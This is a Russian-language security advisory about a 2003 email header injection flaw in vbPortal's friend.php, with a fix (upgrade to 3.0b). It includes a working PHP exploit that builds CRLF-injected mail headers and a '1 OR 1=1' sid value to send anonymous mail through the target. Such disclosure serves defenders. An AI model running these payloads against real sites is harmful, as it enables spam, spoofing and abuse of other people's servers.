Security Lab

Анонимная отправка почтовых сообщений через vbPortal

Дата публикации:25.11.2003
Всего просмотров:1498
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: vbPortal 2.x
Уязвимые версии: vbPortal 2.0 alpha 8.1 и более ранние версии

Описание: Уязвимость обнаружена в vbPortal. Удаленный пользователь может послать анонимное почтовое сообщение через целевую систему.

Удаленный пользователь может использовать функции SendStory() и SendSite() в 'friend.php' сценарии, чтобы послать произвольное почтовое сообщение произвольному адресату. Удаленный пользователь может определить yname и ymail переменные, чтобы внедрить произвольные e-mail заголовки.

Пример/Эксплоит: 

<?
if (!isset($Send)){
?> 

<form action="<? echo $PHP_SELF; ?>">
URL : <input type="text" name="url"><br>
 From : <input type="text" name="from"><br>
Your Name : <input type="text" name="yname"><br>
To : <input type="text" name="fmail"><br>
Content Type : <input type="text" name="contenttype" value="text/plain"><br>
Subject To Add : <input type="text" name="newsubject"><br>
Op. : <br>
<input type="radio" checked name="op" value="SendSite">SendSite<br>
<input type="radio" name="op" value="SendStory">SendStory<br>
Message : <br><br><textarea name="message" rows="6" cols="50"></textarea>
<br><br><input type="submit" name="Send" value="Verify">
</form> 

<?
}else{ 

echo "URL : ".$url."<br>";
echo "From: ".$from."<br>";
echo "Your Name: ".$yname."<br>";
echo "To: ".$fmail."<br>";
echo "Content Type: ".$contenttype."<br>";
echo "Added Subject: ".$newsubject."<br>";
echo "Message : <br><br>".str_replace("\n","<br>",$message); 

if ($op=="SendStory"){ $sid="1%20OR%201=1"; } 

$ymail=$from.">%0A";
$ymail.="Subject:".$newsubject."%0A";
$ymail.="Content-Type:multipart/mixed;%20boundary=Anonymous;";
$ymail.="%0A%0A%0A";
$fname="%0A--Anonymous%0A";
$fname.="Content-Type:".$contenttype."%0A%0A";
$fname.=str_replace("\n","%0A",$message);
$fname.="%0A%0A%0A";
$fname.="--Anonymous--";
$fname.="%0A%0A%0A"; 

$url.="/friend.php?sid=".$sid."&op=".$op."&yname=".$yname."&ymail=".$ymail." 
&fmail=".$fmail."&fname=".$fname; 

echo "<br><br><b><a href=\"$url\">Ok, Mail It</a></b>";
?>

URL производителя: http://www.vbportal.com

Решение:Установите обновленную версию программы (3.0b)

Ссылки: Anonymous Mail Forwarding Vulnerabilities in vbPortal